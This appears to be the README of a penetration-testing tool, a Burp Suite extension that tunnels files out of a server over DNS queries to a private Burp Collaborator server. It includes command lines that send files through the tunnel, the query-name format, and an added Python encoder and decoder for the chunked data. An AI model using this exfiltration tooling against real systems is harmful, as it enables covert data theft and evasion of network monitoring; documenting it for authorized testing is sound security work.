BurpCollaboratorDNSTunnel
A DNS tunnel utilizing the Burp Collaborator.
This extension sets up a private Burp Collaborator server as a DNS tunnel. One of the provided scripts will be used to exfiltrate data from a server through the DNS tunnel, displaying the tunneled data in Burp Suite.
Interactive usage with scripts
Multiple scripts exist for exfiltrating data from different environments. A script is run on the box you want to exfiltrate data from and connects to a Burp Suite instance on your local box.
[B] Burp Suite
[S] Script
1) [B] Click "Start listening"
2) [B] Copy the printed location of the Burp Collaborator server
3) [S] Run the script
4) [S] Enter the Burp Collaborator address from (2) when prompted
5) [S] Paste the name of the file to be tunneled when prompted
6) [B] After tunneling is completed click "Poll now"
Non-interactive usage with scripts
The scripts don't require user interaction if all the necessary information is provided as arguments.
[B] Burp Suite
[S] Script
1) [B] Click "Start listening"
2) [B] Copy the printed location of the Burp Collaborator server
3) [S] Run the script
   - Windows: `./tunnel.ps1 abc123.private-burp.com .\test.txt`
   - Linux: `./tunnel.sh -d abc123.private-burp.com -f test.txt`
4) [B] After tunneling is completed click "Poll now"
Usage between 2 Burp Suite instances
[R] Receiving Burp instance
[S] Sending Burp instance
1) [R] Click "Start listening"
2) [R] Copy the printed location of the Burp Collaborator server
3) [S] Enter the address from (2) in the "Burp Collaborator Address" text box
4) [S] Paste the data to be tunneled in the "Data to tunnel" text box
5) [S] Click "Tunnel Data"
6) [R] After tunneling is completed click "Poll now"
Check the "Verbose" box for debugging information to see any errors in sending/receiving data.
Contributing
It would be nice to have more compact versions of the scripts for instances where you have to hand-type the scripts into the environment. If you would like to modify or add a script, follow the basic protocol below:

1) Tunneling Data

`[dnsFlag].[chunk].[chunkNumber].[burpcollaborator]`, e.g. `nspi.JZSXIU2QJEQGS4ZAMF3WK43PNVSSC.0.fdwkpqtwvgxpk4toz2yduzx75ybozd.private-burp-collaborator.net`

- [dnsFlag] All data being tunneled needs to start with the 'nspi' subdomain; this is the flag the tunnel uses to identify its traffic
- [chunk] A 63-character base32-encoded chunk of data, with any '=' padding removed
- [chunkNumber] The index of the current chunk in the overall tunneled data
- [burpcollaborator] The full address of the private Burp Collaborator server

2) Notifying size of data sent

`[dnsFlag].[amountFlag].[totalChunkCount].[burpcollaborator]`, e.g. `nspi.amount.1.fdwkpqtwvgxpk4toz2yduzx75ybozd.private-burp-collaborator.net`

- [dnsFlag] All data being tunneled needs to start with the 'nspi' subdomain; this is the flag the tunnel uses to identify its traffic
- [amountFlag] This subdomain's value will be 'amount' so the tunnel can identify this as the request declaring the amount of data sent
- [totalChunkCount] The total number of chunks sent through the tunnel, excluding this request
- [burpcollaborator] The full address of the private Burp Collaborator server
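The two request formats above, worked through in Python as an added example (not code from this repository or its scripts): `encode_names` produces the query names a sending script would issue for a payload, and `decode_names` reassembles the payload from the names seen in the receiving Collaborator's interaction log, using the 'amount' request to detect a missing chunk. The Collaborator address is the one from the examples above; the 63-character chunk size matches the maximum length of a single DNS label.

```python
import base64

FLAG = "nspi"           # [dnsFlag] subdomain marking tunnel traffic
AMOUNT_FLAG = "amount"  # [amountFlag] for the chunk-count notification
CHUNK_LEN = 63          # [chunk] length; also the maximum length of a DNS label


def encode_names(data: bytes, collaborator: str) -> list:
    """Build the DNS names a sending script would query, in order: one per
    63-character base32 chunk (padding stripped), then the 'amount' request."""
    b32 = base64.b32encode(data).decode("ascii").rstrip("=")
    chunks = [b32[i:i + CHUNK_LEN] for i in range(0, len(b32), CHUNK_LEN)]
    names = [f"{FLAG}.{c}.{i}.{collaborator}" for i, c in enumerate(chunks)]
    names.append(f"{FLAG}.{AMOUNT_FLAG}.{len(chunks)}.{collaborator}")
    return names


def decode_names(names, collaborator: str) -> bytes:
    """Reassemble tunneled data from the names seen in Collaborator's
    interaction log. Order does not matter, duplicates and unrelated names
    are ignored, and a missing chunk raises ValueError because the 'amount'
    request states how many chunks to expect."""
    suffix = "." + collaborator.lower()
    chunks, expected = {}, None
    for name in names:
        name = name.lower().rstrip(".")   # DNS names are case-insensitive
        if not name.endswith(suffix):
            continue
        labels = name[: -len(suffix)].split(".")
        if len(labels) != 3 or labels[0] != FLAG or not labels[2].isdigit():
            continue
        _, payload, number = labels
        if payload == AMOUNT_FLAG:
            expected = int(number)
        else:
            chunks[int(number)] = payload
    if expected is None:
        raise ValueError("no 'amount' request seen; transfer still in progress")
    missing = [i for i in range(expected) if i not in chunks]
    if missing:
        raise ValueError(f"missing chunks: {missing}")
    b32 = "".join(chunks[i] for i in range(expected))
    b32 += "=" * (-len(b32) % 8)          # restore the stripped '=' padding
    return base64.b32decode(b32, casefold=True)
```

Encoding `NetSPI is awesome!` yields exactly the `nspi.JZSXIU2QJEQGS4ZAMF3WK43PNVSSC.0.…` name shown in the example above, followed by `nspi.amount.1.…`.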
Example
An example is below (click to enlarge). The example is using one Burp Suite instance and a Kali Linux box. <a href="https://github.com/NetSPI/BurpCollaboratorDNSTunnel/blob/master/images/bashDemo.gif?raw=true" target="_blank"><img src="./images/bashDemo.gif"/></a>